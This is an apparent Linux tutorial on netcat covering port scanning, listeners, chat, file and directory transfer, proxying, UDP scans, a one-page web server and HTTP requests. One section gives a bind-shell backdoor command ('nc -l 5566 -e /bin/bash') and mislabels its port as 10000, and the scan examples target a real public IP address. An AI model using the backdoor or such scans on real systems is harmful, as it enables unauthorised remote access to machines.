This comprehensive Linux guide expects that you run the following commands as root user but if you decide to run the commands as a different user then ensure that the user has
sudoaccess and that you precede each of the privileged commands withsudo
netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.
It works similarly to the cat command but it is for the network. It reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to the linux users as it is called the Swiss Army Knife of networking tools. It is most oftenly used by networking specialists to monitor, test and send data across a network.
In this tutorial, we will show you the use of the netcat command with multiple examples.
Installing netcat Command
To install netcat command on your linux machine, you can run the following command
On Debian Based Systems
root@codesposts:~$ apt install netcatOn Red-Hat Based Systems Or CentOS
root@codesposts:~$ yum install nmap-ncatGeneral Syntax
Following is the general syntax of the netcat
root@codesposts:~$ netcat [options] host port
OR
root@codesposts:~$ ncat [options] host port
OR
root@codesposts:~$ nc [options] host portUsing netcat For Port Scanning
netcat is most commenly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. You can use the option -z for only scanning the open ports without sending any data and option -v to get a more detailed output.
root@codesposts:~$ nc -z -v 155.138.206.18 80
Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) openIf you want to display only the open ports, you can filter the output through the grep command like this
root@codesposts:~$ nc -z -v 155.138.206.18 80-300 | grep succeeded Listening To Inbound Connections
You can also use this command to listen to inbound connections to your systems by using the option -l with a specific port to listen from.
root@codespsots:~$ nc -l port
root@codesposts:~$ nc -l 8080Connecting To A System Remotely
You can connect to another system remotely using this command. You can run the command like below
root@codesposts:~$ nc IP_Address Port
root@codesposts:~$ nc 192.168.1.1 80Checking Server Software And It’s Version
You can also use netcat command to find the server software and it’s version by sending the “EXIT” command to the server on the default SSH port 22 like below:
root@codesposts:~$ echo "EXIT" | nc 155.138.206.18 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.Chatting With A Remote System
You can also use netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.
From Server side
root@codesposts:~$ nc -l 4444From Client Side
root@codesposts:~$ nc server-IP 4444Replace the “host-IP” with the IP of the host that is listening for an inbound connection.
Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.
Sending/Receiving Files
You can also use netcat command to send or receive files from one host to another.
For this, you first need to start the listener on the system on which the file is to be received.
root@codesposts:~$ nc -l 4444 > file.txtNow, you can send the file from the other host using this port by running the command like this
root@codesposts:~$ nc host-IP 4444 < file.txtReplace the “host-IP” with the IP of the host that is listening for the file to be received.
Sending/Receiving Directory
If you want to send a directory using netcat command, you first need to make an archive of that directory using tar command and then send it over using the netcat command.
root@codesposts:~$ tar czvf - /path/to/directory | nc host-IP 4444Then you can receive the file and extract it using the command like this
root@codesposts:~$ nc -l 4444 | tar xzvf -Using netcat As Proxy
You can also use netcat command as a proxy for your system.
root@codesposts:~$ nc -l 4444 | nc 192.168.100.1 40Now all the connections coming to our server on port 4444 will be automatically redirected to 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred & to be able to receive the data back, we need to create a two way pipe. Use the following commands to do so:
root@codesposts:~$ mkfifo 2way
root@codesposts:~$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2wayAfter this command, you will be able to send a receive data over proxy.
Using UDP Ports
If you want to scan UDP ports, you can just add the option -u with the command
root@codesposts:~$ nc -u -z -v 192.168.100.1 80-200
192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) openSimilarly, you can add this option to any netcat command to implement it on the UDP ports.
Creating A Backdoor Using netcat Command
You can also use netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:
root@codesposts:~$ nc -l 5566 -e /bin/bash-e flag attaches a bash to port 10000. Now a client can connect to port 10000 on server & will have complete access to our system via bash by running the command like this:
root@codesposts:~$ nc 192.168.100.1 5566Running A Web Server With A Static Page Using netcat
You can also start a web server using the netcat command on a local host that will open a static web page “sample.html”. To perform this, you can run the command like this
First, make a new file with the name “sample.html” and copy the following code into the file.
<html>
<head>
<title>Test Page</title>
</head>
<body>
<h1>Level 1 header</h1>
<h2>Subheading</h2>
<p>Normal text here</p>
</body>
</html>Then run the following command:
root@codesposts:~$ while true; do sudo nc -lp 80 < sample.html; doneAfter this, you can access the page on by going to “http://server-IP.com/sample.html”
Setting The Connection Timeout
If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.
root@codesposts:~$ nc -w 10 192.168.100.1 4444Making The Server Persistent
The server will terminate automatically when the client disconnects from it. To make the server to listen to more connections even when a client disconnects, you can use the option -k with the netcat command.
root@codesposts:~$ nc -l -k 4444Performing HTTP Request
You can also use this command to send various HTTP requests to a remote server.
For example, if you want to retrieve the netcat main page from the OpenBSD web site, run this command:
root@codesposts:~$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80
